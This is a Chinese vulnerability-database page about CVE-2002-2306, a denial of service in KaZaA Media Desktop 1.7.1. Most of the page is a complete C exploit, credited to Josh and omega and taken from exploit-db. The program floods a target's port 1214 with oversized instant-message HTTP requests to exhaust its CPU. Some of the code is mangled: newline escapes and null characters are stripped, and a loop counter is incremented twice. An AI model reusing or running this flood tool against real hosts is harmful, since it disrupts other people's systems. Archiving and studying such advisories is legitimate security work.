KaZaA Media Desktop Large Message服务拒绝漏洞-安全小百科

KaZaA Media Desktop Large Message服务拒绝漏洞

漏洞ID	1106875	漏洞类型	资源管理错误
发布时间	2002-07-25	更新时间	2002-12-31
CVE编号	CVE-2002-2306	CNNVD-ID	CNNVD-200212-311
漏洞平台	Windows	CVSS评分	7.8

|漏洞来源

https://www.exploit-db.com/exploits/21653
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-311

|漏洞详情

SharmanNetworksKaZaAMediaDesktop1.7.1版本存在漏洞。远程攻击者通过发送一些超大消息导致服务拒绝（CPU消耗）。

|漏洞EXP

source: http://www.securityfocus.com/bid/5317/info

KaZaA may consume large amounts of CPU when processing a sequence of large messages. It is possible for an attacker to flood a vulnerable system with a large number of messages, resulting in a denial of service condition.

/*
   kazaa denial of service attack
   by Josh and omega
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdarg.h>

#define PORT 1214


int main(int argc, char *argv[])
{
   int fd, numbytes, randnum, k;
   struct hostent *host;
   struct sockaddr_in them;
   char buf2[4026];
   char buf[5000];
   char *bigboy;
   int i, size, j;


   memset(buf2, 'a', sizeof(buf2));
   buf2[sizeof(buf2)-1]='';
   srand(time(NULL));

   if (argc < 5)
   {
      fprintf(stderr,"usage: %s <hostname> <(this*4026) bytes per message> <username_of_target> <number_of_messages>n", argv[0]);
      exit(1);
   }
   if ((host=gethostbyname(argv[1])) == NULL)
   {
      perror("gethostbyname");
      exit(1);
   }

   them.sin_family = AF_INET;
   them.sin_port = htons(PORT);
   them.sin_addr = *((struct in_addr *)host->h_addr);
   memset(&(them.sin_zero), '', 8);


   size=(4042*atoi(argv[2]))+280+1;
   bigboy=(char *)malloc(size);

   snprintf(bigboy, size, "GET /.message HTTP/1.1nHost: 68.10.112.148:1214nUserAgent: KazaaClient Jan 18 2002 18:53:21nX-Kazaa-Username: 31337h4x0rnX-Kazaa-Network: KaZaAnX-Kazaa-IP: %d:1214nX-Kazaa-SupernodeIP: %d:1214nConnection:  opennX-Kazaa-IMTo: %s@KaZaAnX-Kazaa-IMType: user_textn", randnum, randnum, argv[3]);

   /* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */
   snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %sn", buf2);
   for(k=0;k<atoi(argv[2]);k++)
   {
      strcat(bigboy, buf);
      k++;
   }
   strcat(bigboy, "rnrnrnrnrn");

   fprintf(stdout, "done preparing packet... sendingn");
   for(i=0, k=0;i<atoi(argv[4]);i++)
   {
     if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
       perror("socket");
     }
     else
     {
       if (connect(fd, (struct sockaddr *)&them,sizeof(struct sockaddr)) == -1)
       {
         perror("connect");
       }
       else
       {
         printf("sending %d messagen", k);
         write(fd, bigboy, strlen(bigboy));
         k++;
         close(fd);
       }
     }
   }
   fprintf(stdout, "n%d out of %d attempted got throughn", k, i);
   free(bigboy);
   return 0;
}

|参考资料

来源:BID
名称:5317
链接:http://www.securityfocus.com/bid/5317
来源:XF
名称:kazaa-large-msg-dos(9672)
链接:http://xforce.iss.net/xforce/xfdb/9672

相关推荐: Elm Alternative-Folder Buffer Overflow Vulnerability

Elm Alternative-Folder Buffer Overflow Vulnerability 漏洞ID 1103410 漏洞类型 Boundary Condition Error 发布时间 2001-02-13 更新时间 2001-02-13 CV…

文章版权归作者所有，未经允许请勿转载。

THE END